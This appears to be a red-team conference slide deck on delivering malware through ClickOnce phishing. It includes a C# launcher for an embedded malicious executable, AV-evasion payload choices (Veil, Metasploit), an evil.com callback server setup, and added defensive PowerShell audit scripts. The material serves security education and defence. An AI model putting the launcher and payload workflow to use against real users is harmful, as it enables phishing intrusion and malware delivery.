MSDN: https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx

9. ClickOnce Trust Architecture (cont.)
• When ClickOnce was originally being developed in .NET 2.0 Beta 2, permissions looked promising, with the Internet zone being restricted to applications signed by a valid certificate.
Zone             Applications
My Computer      Enabled
Local Intranet   Enabled
Trusted Sites    Enabled
Internet         Enabled for signed apps
Untrusted Sites  Disabled

10. ClickOnce Trust Architecture (cont.)
• Unfortunately, Microsoft decided to change this, specifically the Internet zone, and not for the best
• Now, by default, ClickOnce packages that come from the Internet allow a user to grant the application temporary admin privileges in order to install
Zone             Applications
My Computer      Enabled
Local Intranet   Enabled
Trusted Sites    Enabled
Internet         Enabled
Untrusted Sites  Disabled
11. Owning With a Click
• Why use a ClickOnce application?
– ClickOnce is supported on all modern Windows operating systems since it relies on .NET
– All distributions come with at least .NET 2.0 since Windows Server 2k3
– .NET supports backwards compatibility
– Dead simple to write
– Public browser exploits are highly version specific and, more often than not, crash the victim’s browser

12. Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer
– ClickOnce is supported by IE 6.0+
– Now supported by Firefox and Chrome using third-party addons (.NET 3.5+)
• Minimizes user interaction
• Delivering malicious code through multiple options
– It’s a .NET project – write your own
– Include malicious executable as a resource

13. Payloads
• Roll your own payload
– Our original vector
– Flagged by AV
• Standard Metasploit payload
– Also attempted
– Reverse_HTTPS returned broken shells
• Assumed due to AV or something inline during delivery of the second Meterpreter stage

14. Payloads (cont.)
• Powershell
– Justin@sixdub did a great write-up on using Powershell commands instead of an executable for a Meterpreter callback with ClickOnce
– Pros:
• Powershell command runs in memory – never touches disk
– Cons:
• Difficulty in changing payloads
• ClickOnce is already on disk
http://www.sixdub.net/?p=555

15. Payloads (cont.)
• Veil
– Pros:
• Payloads written in different languages
• Encrypted payloads – less likely to get caught by AV
– Cons:
• Static “random” Meterpreter callback
• This is an issue with how Metasploit handles stagers – will be fixed (hopefully) soon
• We decided to go with Veil since we needed to avoid AV detection during our Red Team engagement

16. Payloads (cont.)
• Problem:
– Static Meterpreter callbacks from targets
• Solution?:
– Dynamically generating individualized Veil payloads
17. Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce applications
– The free edition of Visual Studio 2013 supports ClickOnce publishing
• Start a new console application project within Visual Studio
– No GUI popup during execution

18. Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)

static class Program
{
    static void Main()
    {
        // Starting a new process executing the malicious exe
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = false;
        p.StartInfo.FileName = "ClickOnceInc.exe";
        p.Start();
    }
}

19. Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct version of .NET so the application runs properly.
• Here, .NET 3.5 was chosen by navigating to the Application tab on the left and selecting the Target Framework from the dropdown.

20. Creating a ClickOnce Application (cont.)

21. Creating a ClickOnce Application (cont.)
• Include your malicious binary in the project by clicking and dragging it over your Solution Explorer

22. Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
– Ensure the Install Mode is set to “available online only”
• This prevents the application from showing up in the Start Menu
– Click the Application Files… button
• Exclude the hash for ClickOnceInc.exe
– Dynamic payload generation changes the hash

23. Creating a ClickOnce Application (cont.)

24. Creating a ClickOnce Application (cont.)
• Click the Publish button and follow the wizard to publish the ClickOnce application to your local drive
• There should be multiple files/directories
– Application Files directory
– Evil Survey.application
– Publish.htm
– Setup.exe

25. Creating a ClickOnce Application (cont.)
26. Server Setup
• Web server with ClickOnce-specific directories
– Kali with Veil, Metasploit, and Apache
• Apache mod_rewrite
– GET evil.com?u={ID} -> evil.com/{ID}/evil.application
– Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering

27. Callback Listener
• Our solution:
– Metasploit listener
• Phishing scenario – targets are workstations
• Most likely have outbound HTTP access
• Limited window of engagement
• Egress filtering – ssh / icmp / dns tunneling

28. Pitfalls
• Outdated packages / dependencies
– Veil, Python, Wine
• Signing restrictions
– No signing allowed with dynamic payloads
• No easy way to use mage.exe on Linux
– Self-signed certs are only marginally better

29. Cleanup
• ClickOnce install directory:
– %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}
• C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}

30. Cleanup
• Add/Remove Programs
• Delete relevant AppData folder
• Nuke everything:
rundll32 dfshim CleanOnlineAppCache
– Note: This will clear the entire online application cache.
– No need for elevated privileges, AppCaches are user-specific.
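The cache layout from the Cleanup slides and the manifest fields from the ClickOnce Internals slide also give an incident responder a quick inventory of what ClickOnce has run as a given user. The PowerShell below is an added example, not code from the talk: it walks %LOCALAPPDATA%\Apps\2.0, parses each cached deployment or application manifest, and flags those that request full trust without carrying a signature. Function names and output fields are my own; the cache root is the one shown above.

```powershell
# Added example, not from the talk: inventory a user's ClickOnce cache and triage each
# cached manifest. Function names and output fields are this example's own choices.

function Read-ClickOnceManifest {
    param([Parameter(Mandatory)][string]$Path)

    try {
        [xml]$doc = Get-Content -LiteralPath $Path -Raw -ErrorAction Stop
    } catch {
        # Unparseable or partially written file: report it rather than skip it silently.
        return [pscustomobject]@{ Path = $Path; Parsed = $false; Name = $null; Version = $null;
                                  FullTrust = $null; Signed = $null; Codebase = $null; Executable = $null }
    }

    # local-name() sidesteps the several urn:schemas-microsoft-com:asm.* namespaces the
    # manifests use. The first assemblyIdentity names the deployment (.application) or the
    # application (.exe.manifest) itself.
    $ident    = $doc.SelectSingleNode("//*[local-name()='assemblyIdentity']")
    $perm     = $doc.SelectSingleNode("//*[local-name()='PermissionSet']")
    $sig      = $doc.SelectSingleNode("//*[local-name()='Signature']")
    $provider = $doc.SelectSingleNode("//*[local-name()='deploymentProvider']")
    $cmdline  = $doc.SelectSingleNode("//*[local-name()='entryPoint']/*[local-name()='commandLine']")

    [pscustomobject]@{
        Path       = $Path
        Parsed     = $true
        Name       = if ($ident)    { $ident.GetAttribute('name') }       else { $null }
        Version    = if ($ident)    { $ident.GetAttribute('version') }    else { $null }
        # Unrestricted="true" is the Full Trust request the Preventative Measures slides describe.
        FullTrust  = ($null -ne $perm -and $perm.GetAttribute('Unrestricted') -eq 'true')
        # Any XML-DSig Signature element; absence means the "Unsigned" stage from the signing slide.
        Signed     = ($null -ne $sig)
        # Where the deployment manifest says it came from: the phishing URL in the scenario above.
        Codebase   = if ($provider) { $provider.GetAttribute('codebase') } else { $null }
        # The file the manifest names as the executable to run.
        Executable = if ($cmdline)  { $cmdline.GetAttribute('file') }     else { $null }
    }
}

function Get-ClickOnceCacheInventory {
    [CmdletBinding()]
    param(
        # Cache root from the Cleanup slide: %LOCALAPPDATA%\Apps\2.0
        [string]$CacheRoot = (Join-Path $env:LOCALAPPDATA 'Apps\2.0')
    )

    if (-not (Test-Path -LiteralPath $CacheRoot)) {
        Write-Verbose "No ClickOnce cache found at $CacheRoot"
        return
    }

    # Both manifest kinds are cached under the obfuscated per-machine folders shown above.
    Get-ChildItem -LiteralPath $CacheRoot -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.application', '.manifest' } |
        ForEach-Object { Read-ClickOnceManifest -Path $_.FullName }
}

# Usage: cached apps that ask for full trust yet carry no signature; -Verbose reports an
# empty cache. Run as the affected user, since the cache is user-specific.
Get-ClickOnceCacheInventory -Verbose |
    Where-Object { $_.FullTrust -and -not $_.Signed } |
    Format-Table Name, Version, Codebase, Executable, Path -AutoSize
```

Collect the inventory before running the CleanOnlineAppCache cleanup above, since that wipes the evidence it reads.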
31. Demo
• Client:
– Windows 7
• Server (evil.com):
– Kali running Apache to serve file
– Metasploit listener running to catch callback

32. Preventative Measures
• Typical Anti-Phishing Techniques
– User education
• Users continue through “… a quarter of Google Chrome’s malware and phishing warnings”
– Endpoint protection
• Signatures lag behind usage
• Heuristics require a practical balance
• Limited usefulness for other phishing-based vectors
– Least privileged configurations

33. Preventative Measures
• ClickOnce-Specific Techniques
– Code Access Security
• ClickOnce applications can specify a “permissions level”
• Default: Full Trust – requires prompt for elevation

34. Preventative Measures
• Disabling Trust Prompt
– HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
– Trust prompt is controlled by zone
• Untrusted Sites
• Internet
• My Computer
• Local Intranet
• Trusted Sites

35. Preventative Measures
String Value subkey   Value
Internet              Enabled
UntrustedSites        Disabled
MyComputer            Enabled
LocalIntranet         Enabled
TrustedSites          Enabled

Option                      Registry setting value
Enable the trust prompt.    Enabled
Restrict the trust prompt.  AuthenticodeRequired
Disable the trust prompt.   Disabled
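Turning the two tables above into something enforceable: the PowerShell below is an added example, not code from the talk. It audits each zone's String Value under the PromptingLevel key and, with -Enforce, writes a baseline that restricts the Internet zone to AuthenticodeRequired (the .NET 2.0 Beta 2 behaviour from the Trust Architecture slides) and disables Untrusted Sites. The baseline, the function name and the Wow6432Node remark in the comments are my own choices; the key, zone names and values are the ones on the slides.

```powershell
# Added example, not from the talk: audit, and optionally enforce, the per-zone ClickOnce
# trust-prompt settings. Key, zone names and values are from the slides; the baseline
# and function name are this example's own.

# On 64-bit Windows a Wow6432Node mirror of this path exists for 32-bit runtimes; pass it
# via -KeyPath as well if you want it audited too (assumption, not from the talk).
$ClickOncePromptingLevelKey = 'HKLM:\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel'

function Test-ClickOncePromptingLevel {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string[]]$KeyPath = @($ClickOncePromptingLevelKey),
        # Baseline: Internet only prompts for Authenticode-signed apps; Untrusted Sites never
        # prompts. Zones missing from the baseline are reported but never changed.
        [hashtable]$Baseline = @{ Internet = 'AuthenticodeRequired'; UntrustedSites = 'Disabled' },
        [switch]$Enforce
    )

    $zones = 'MyComputer', 'LocalIntranet', 'TrustedSites', 'Internet', 'UntrustedSites'

    foreach ($key in $KeyPath) {
        $exists = Test-Path -LiteralPath $key
        foreach ($zone in $zones) {
            $current = $null
            if ($exists) {
                $current = (Get-ItemProperty -LiteralPath $key -Name $zone -ErrorAction SilentlyContinue).$zone
            }
            $wanted = $Baseline[$zone]
            # An absent value counts as non-compliant: the runtime then uses its built-in
            # default, which the slides show is Enabled for the Internet zone.
            $compliant = if ($wanted) { $current -eq $wanted } else { $null }

            $needsFix = $Enforce -and $wanted -and -not $compliant
            if ($needsFix -and $PSCmdlet.ShouldProcess("$key : $zone", "Set to $wanted")) {
                if (-not $exists) {
                    New-Item -Path $key -Force | Out-Null   # creates intermediate keys; needs admin
                    $exists = $true
                }
                # The table lists these as String Values (REG_SZ).
                New-ItemProperty -LiteralPath $key -Name $zone -Value $wanted -PropertyType String -Force | Out-Null
                $current   = $wanted
                $compliant = $true
            }

            [pscustomobject]@{
                Key       = $key
                Zone      = $zone
                Current   = if ($current) { $current } else { '<not set>' }
                Baseline  = $wanted
                Compliant = $compliant
            }
        }
    }
}

# Usage: audit only. Add -Enforce -WhatIf to preview writes, or -Enforce to apply them
# (writing under HKLM requires an elevated shell).
Test-ClickOncePromptingLevel | Format-Table Zone, Current, Baseline, Compliant -AutoSize
```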
36. Preventative Measures
• Windows 8 – SmartScreen Filter
• Enabled by default
• Adds another layer after the user clicks ‘Run’ for anything not signed by a recognized CA
• Default ‘OK’ action results in the application not running

37. Flowchart by Robin Shahan (@robindotnet)

38. Questions?

39. More Information / References
• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
– Devdatta Akhawe, University of California, Berkeley, devdatta@cs.berkeley.edu
– Adrienne Porter Felt, Google, Inc., felt@google.com
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555
• https://blog.netspi.com/